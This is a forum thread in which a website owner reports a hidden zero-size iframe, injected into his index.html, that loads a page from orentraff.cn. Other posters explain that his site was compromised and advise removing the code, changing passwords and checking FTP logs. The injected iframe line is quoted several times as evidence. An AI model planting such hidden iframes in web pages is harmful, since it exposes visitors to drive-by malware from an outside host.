Hi everyone,
I recently had some problem accessing the main page of my website : it
displayed a blank page instead of my usual welcome message.
I found out that the culprit was the "index.html" file. Here's what its
code showed :
<!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0"
height="0" style="display:none"></iframe><!-- ~ -->

I created my site four years ago and never altered it since. After such
a long time I therefore don't remember writing this code, especially the
"orentraff.cn" bit.

After many attempts to understand why a blank page appeared I finally
gave up : I erased the file and replaced it with a new one. It now works
OK. Yet the problem could arise again at any time.

1 - Does anyone know what the code mentioned above (in particular
orentraff.cn) means ?
2 - Does anyone know what happened to my index file ? Did it get
corrupted or was my site hacked ?

Many thanks in advance for your kind replies and help.
Thierry

On Apr 22, 5:52=A0pm, ThL <Thierry [at] tlariviereATnordnetDOTfr> wrote:
> Hi everyone,
> I recently had some problem accessing the main page of my website : it
> displayed a blank page instead of my usual welcome message.
> I found out that the culprit was the "index.html" file. Here's what its
> code showed :
> <!-- ~ --><iframe src=3D"http://orentraff.cn/in.cgi?3" width=3D"0"
> height=3D"0" style=3D"display:none"></iframe><!-- ~ -->
>
> I created my site four years ago and never altered it since. After such
> a long time I therefore don't remember writing this code, especially the
> "orentraff.cn" bit.
>
> After many attempts to understand why a blank page appeared I finally
> gave up : I erased the file and replaced it with a new one. It now works
> OK. Yet the problem could arise again at any time.
>
> 1 - Does anyone know what the code mentioned above (in particular
> orentraff.cn) means ?

orentraff.cn is a domain name. The code was calling something from
another server into an invisible iframe. That something is probably
malicious.

> 2 - Does anyone know what happened to my index file ? Did it get
> corrupted or was my site hacked ?

You were hacked.

Steve

Steve Pugh a écrit :
> On Apr 22, 5:52 pm, ThL <Thierry [at] tlariviereATnordnetDOTfr> wrote:
>> Hi everyone,
>> I recently had some problem accessing the main page of my website : it
>> displayed a blank page instead of my usual welcome message.
>> I found out that the culprit was the "index.html" file. Here's what its
>> code showed :
>> <!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0"
>> height="0" style="display:none"></iframe><!-- ~ -->
>>
>> I created my site four years ago and never altered it since. After such
>> a long time I therefore don't remember writing this code, especially the
>> "orentraff.cn" bit.
>>
>> After many attempts to understand why a blank page appeared I finally
>> gave up : I erased the file and replaced it with a new one. It now works
>> OK. Yet the problem could arise again at any time.
>>
>> 1 - Does anyone know what the code mentioned above (in particular
>> orentraff.cn) means ?
>
> orentraff.cn is a domain name. The code was calling something from
> another server into an invisible iframe. That something is probably
> malicious.
>
>> 2 - Does anyone know what happened to my index file ? Did it get
>> corrupted or was my site hacked ?
>
> You were hacked.
>
> Steve

Oops...
Thanks for your quick reply Steve.

Next step :
Now what ?


Thierry

ThL wrote:
> Steve Pugh a écrit :
<snip>
>> You were hacked.

> Oops...
> Thanks for your quick reply Steve.
>
> Next step :
> Now what ?

Remove the line of code.

Contact hosting company and find out how someone else could have gotten
write access to your account.

--
Take care,

Jonathan
-------------------
LITTLE WORKS STUDIO
http://www.LittleWorksStudio.com

Jonathan N. Little a écrit :
> ThL wrote:
>> Steve Pugh a écrit :
> <snip>
>>> You were hacked.
>
>> Oops...
>> Thanks for your quick reply Steve.
>>
>> Next step :
>> Now what ?

Hi Johnathan,
Thanks for your reply.
>
> Remove the line of code.

I erased the file and replaced it with a new index.html one.
>
> Contact hosting company and find out how someone else could have gotten
> write access to your account.
>
I first contacted my ISP, who host my site and asked them what the
matter was.
Unfortunately they were unable to give me any further info, apart from
the fact that the "ghost" site was registered in China.
I suppose the question of knowing "how someone got my write access" must
have come to their minds, though they didn't mention it to me.
Maybe they think I was not careful enough with my private passwords,
which could be the case. One never knows.
I'll ask them the question.

Another question just popped : Are these hacking situations common ? If
so, what do they use the hacked sites for ? Storing and exchanging
illegal data ?

Thierry

Jonathan N. Little wrote:
> ThL wrote:
>> Steve Pugh a écrit :
> <snip>
>>> You were hacked.
>
>> Oops...
>> Thanks for your quick reply Steve.
>>
>> Next step :
>> Now what ?
>
> Remove the line of code.
>
> Contact hosting company and find out how someone else could have gotten
> write access to your account.
>

The other thing the OP should do is change his password to something
good and strong. Also see if the hosting co. will let him change his
user ID as well.

--
Ed Mullen
http://edmullen.net
Oooo, baby, it's a big old goofy world. - John Prine

ThL wrote:
> Hi everyone,
> I recently had some problem accessing the main page of my website : it
> displayed a blank page instead of my usual welcome message.
> I found out that the culprit was the "index.html" file. Here's what its
> code showed :
> <!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0"
> height="0" style="display:none"></iframe><!-- ~ -->
>
> I created my site four years ago and never altered it since. After such
> a long time I therefore don't remember writing this code, especially the
> "orentraff.cn" bit.
>
> After many attempts to understand why a blank page appeared I finally
> gave up : I erased the file and replaced it with a new one. It now works
> OK. Yet the problem could arise again at any time.
>
> 1 - Does anyone know what the code mentioned above (in particular
> orentraff.cn) means ?

It means your page consisted of an invisible iframe of zero width and
zero height set up to display the page at the address shown. I'm
guessing, since the page was conspicuously set up not to be seen within
yours, that it's meant to do nastry things to the computer of anyone who
visits your page.

> 2 - Does anyone know what happened to my index file ? Did it get
> corrupted or was my site hacked ?

Yes, someone in China hacked into your website.

ThL wrote:
> Jonathan N. Little a écrit :
>> ThL wrote:
>>> Steve Pugh a écrit :
>> <snip>
>>>> You were hacked.
>>
>>> Oops...
>>> Thanks for your quick reply Steve.
>>>
>>> Next step :
>>> Now what ?
>
> Hi Johnathan,
> Thanks for your reply.
>>
>> Remove the line of code.
>
> I erased the file and replaced it with a new index.html one.
>>
>> Contact hosting company and find out how someone else could have
>> gotten write access to your account.
>>
> I first contacted my ISP, who host my site and asked them what the
> matter was.
> Unfortunately they were unable to give me any further info, apart from
> the fact that the "ghost" site was registered in China.
> I suppose the question of knowing "how someone got my write access" must
> have come to their minds, though they didn't mention it to me.
> Maybe they think I was not careful enough with my private passwords,
> which could be the case. One never knows.
> I'll ask them the question.

If this a ISP's webspace that came with internet connection account, we
sometimes the little "Mom & Pop" ISPs are real amateurs with respect to
hosting. Only time I had a hacked site was with an ISP personal
webspace. They did not restrict access for their FTP account to users
home folder (very basic security) and I even told them that once I FTPed
in I could wander all over the server... This was back in the 90's. Get
real hosting and this should not be a problem.

>
> Another question just popped : Are these hacking situations common ? If
> so, what do they use the hacked sites for ? Storing and exchanging
> illegal data ?

Using your site to plant malware on unsecured browsers and gullible
visitors.

If these people who host your site don't know how your site was hacked
(and you did not tell anyone else your FTP password) I'd find a better
place to host your site. BTW, if you have not editied your page yet,
look at the modification date to give you some idea when it was hacked...

--
Take care,

Jonathan
-------------------
LITTLE WORKS STUDIO
http://www.LittleWorksStudio.com

Harlan Messinger a écrit :
> ThL wrote:
>> Hi everyone,
>> I recently had some problem accessing the main page of my website : it
>> displayed a blank page instead of my usual welcome message.
>> I found out that the culprit was the "index.html" file. Here's what
>> its code showed :
>> <!-- ~ --><iframe src="http://orentraff.cn/in.cgi?3" width="0"
>> height="0" style="display:none"></iframe><!-- ~ -->
>>
>> I created my site four years ago and never altered it since. After
>> such a long time I therefore don't remember writing this code,
>> especially the "orentraff.cn" bit.
>>
>> After many attempts to understand why a blank page appeared I finally
>> gave up : I erased the file and replaced it with a new one. It now
>> works OK. Yet the problem could arise again at any time.
>>
>> 1 - Does anyone know what the code mentioned above (in particular
>> orentraff.cn) means ?
>
> It means your page consisted of an invisible iframe of zero width and
> zero height set up to display the page at the address shown. I'm
> guessing, since the page was conspicuously set up not to be seen within
> yours, that it's meant to do nastry things to the computer of anyone who
> visits your page.
>

Thanks for your reply.

Would you know how ?

Thierry

>> 2 - Does anyone know what happened to my index file ? Did it get
>> corrupted or was my site hacked ?
>
> Yes, someone in China hacked into your website.

ThL wrote:
> Harlan Messinger a écrit :
>> ThL wrote:
>>> Hi everyone,
>>> I recently had some problem accessing the main page of my website :
>>> it displayed a blank page instead of my usual welcome message.
[snip]
>> It means your page consisted of an invisible iframe of zero width and
>> zero height set up to display the page at the address shown. I'm
>> guessing, since the page was conspicuously set up not to be seen
>> within yours, that it's meant to do nastry things to the computer of
>> anyone who visits your page.
>
> Thanks for your reply.
>
> Would you know how ?

No. But clearly you have a security leak somewhere.

Harlan Messinger wrote:
> ThL wrote:
>> Harlan Messinger a écrit :
>>> ThL wrote:
>>>> Hi everyone,
>>>> I recently had some problem accessing the main page of my website :
>>>> it displayed a blank page instead of my usual welcome message.
> [snip]
>>> It means your page consisted of an invisible iframe of zero width and
>>> zero height set up to display the page at the address shown. I'm
>>> guessing, since the page was conspicuously set up not to be seen
>>> within yours, that it's meant to do nastry things to the computer of
>>> anyone who visits your page.
>>
>> Thanks for your reply.
>>
>> Would you know how ?
>
> No. But clearly you have a security leak somewhere.

As I said elsewhere in the thread, before to fix the page check the
modification date, that can help you determine when the hack occurred.
If it was not too long ago your ISP should have the FTP session logged.
I would start there...

--
Take care,

Jonathan
-------------------
LITTLE WORKS STUDIO
http://www.LittleWorksStudio.com

Jonathan N. Little a écrit :
> Harlan Messinger wrote:
>> ThL wrote:
>>> Harlan Messinger a écrit :
>>>> ThL wrote:
>>>>> Hi everyone,
>>>>> I recently had some problem accessing the main page of my website :
>>>>> it displayed a blank page instead of my usual welcome message.
>> [snip]
>>>> It means your page consisted of an invisible iframe of zero width
>>>> and zero height set up to display the page at the address shown. I'm
>>>> guessing, since the page was conspicuously set up not to be seen
>>>> within yours, that it's meant to do nastry things to the computer of
>>>> anyone who visits your page.
>>>
>>> Thanks for your reply.
>>>
>>> Would you know how ?
>>
>> No. But clearly you have a security leak somewhere.
>
> As I said elsewhere in the thread, before to fix the page check the
> modification date, that can help you determine when the hack occurred.
> If it was not too long ago your ISP should have the FTP session logged.
> I would start there...
>
OK then I'll contact them and ask the question.

All this is very worrying.

Thanks a lot for your help, Johnathan, Harlan and Steve !

Thierry